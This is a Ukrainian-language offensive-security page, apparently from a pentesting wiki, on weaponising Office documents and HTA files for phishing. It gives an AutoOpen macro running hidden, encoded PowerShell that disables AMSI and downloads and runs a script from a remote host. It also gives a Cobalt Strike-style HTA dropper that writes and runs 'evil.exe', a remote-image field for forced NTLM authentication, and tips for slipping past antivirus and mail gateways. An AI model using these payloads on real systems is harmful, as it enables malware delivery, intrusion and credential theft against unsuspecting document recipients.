Офісні документи

Microsoft Word виконує перевірку даних файлу перед відкриттям файлу. Перевірка даних виконується у формі ідентифікації структури даних, відповідно до стандарту OfficeOpenXML. Якщо під час ідентифікації структури даних виникає помилка, аналізований файл не буде відкрито.

Зазвичай файли Word, що містять макроси, мають розширення .docm. Однак можливо перейменувати файл, змінивши розширення файлу, і все ще зберігати їх можливості виконання макросів. Наприклад, файл RTF не підтримує макроси за замовчуванням, але файл DOCM, перейменований на RTF, буде оброблений Microsoft Word і матиме можливість виконання макросів. Ті самі внутрішності та механізми застосовуються до всього програмного забезпечення пакету Microsoft Office (Excel, PowerPoint тощо).

Ви можете скористатися наступною командою, щоб перевірити, які розширення будуть виконуватися деякими програмами Office:

assoc | findstr /i "word excel powerp"

DOCX файли, які посилаються на віддалений шаблон (Файл – Опції – Додатки – Керування: Шаблони – Перейти), що містить макроси, можуть також "виконувати" макроси.

Завантаження зовнішнього зображення

Перейдіть до: Вставити --> Швидкі частини --> Поле Категорії: Посилання та посилання, Імена полів: includePicture, та Ім'я файлу або URL: http://<ip>/whatever

Задній вхід макросів

Можна використовувати макроси для виконання довільного коду з документа.

Функції автозавантаження

Чим більш поширені вони є, тим ймовірніше, що Антивірус виявить їх.

• AutoOpen()

• Document_Open()

Приклади коду макросів

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub

Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Вручну видалити метадані

Перейдіть до Файл > Інформація > Перевірка документа > Перевірка документа, що викличе Документ-інспектор. Натисніть Перевірити, а потім Видалити все поряд з Властивості документа та особиста інформація.

Розширення документа

Після завершення виберіть розкривний список Зберегти як тип, змініть формат з .docx на Word 97-2003 .doc. Робіть це, оскільки неможливо зберегти макроси всередині .docx і є стігма навколо розширення з макросами .docm (наприклад, значок мініатюри має велике ! і деякі веб-портали/поштові шлюзи блокують їх повністю). Тому це спадкове розширення .doc є найкращим компромісом.

Генератори шкідливих макросів

• MacOS

• macphish

• Mythic Macro Generator

Файли HTA

HTA - це програма Windows, яка поєднує HTML та мови сценаріїв (такі як VBScript та JScript). Вона генерує користувацький інтерфейс та виконується як "повністю довірена" програма, без обмежень моделі безпеки браузера.

HTA виконується за допомогою mshta.exe, який зазвичай встановлюється разом з Internet Explorer, що робить mshta залежним від IE. Тому, якщо його було видалено, HTA не зможе виконатися.

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>

<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

Примусова аутентифікація NTLM

Існує кілька способів примусової аутентифікації NTLM "віддалено", наприклад, ви можете додати невидимі зображення до електронних листів або HTML, які користувач відкриє (навіть HTTP MitM?). Або надішліть жертві адресу файлів, які спричинять аутентифікацію лише для відкриття папки.

Перевірте ці ідеї та багато іншого на наступних сторінках:

Пересилання NTLM

Не забувайте, що ви можете не лише вкрасти хеш або аутентифікацію, але також здійснювати атаки пересилання NTLM:

• Атаки пересилання NTLM

• AD CS ESC8 (пересилання NTLM на сертифікати)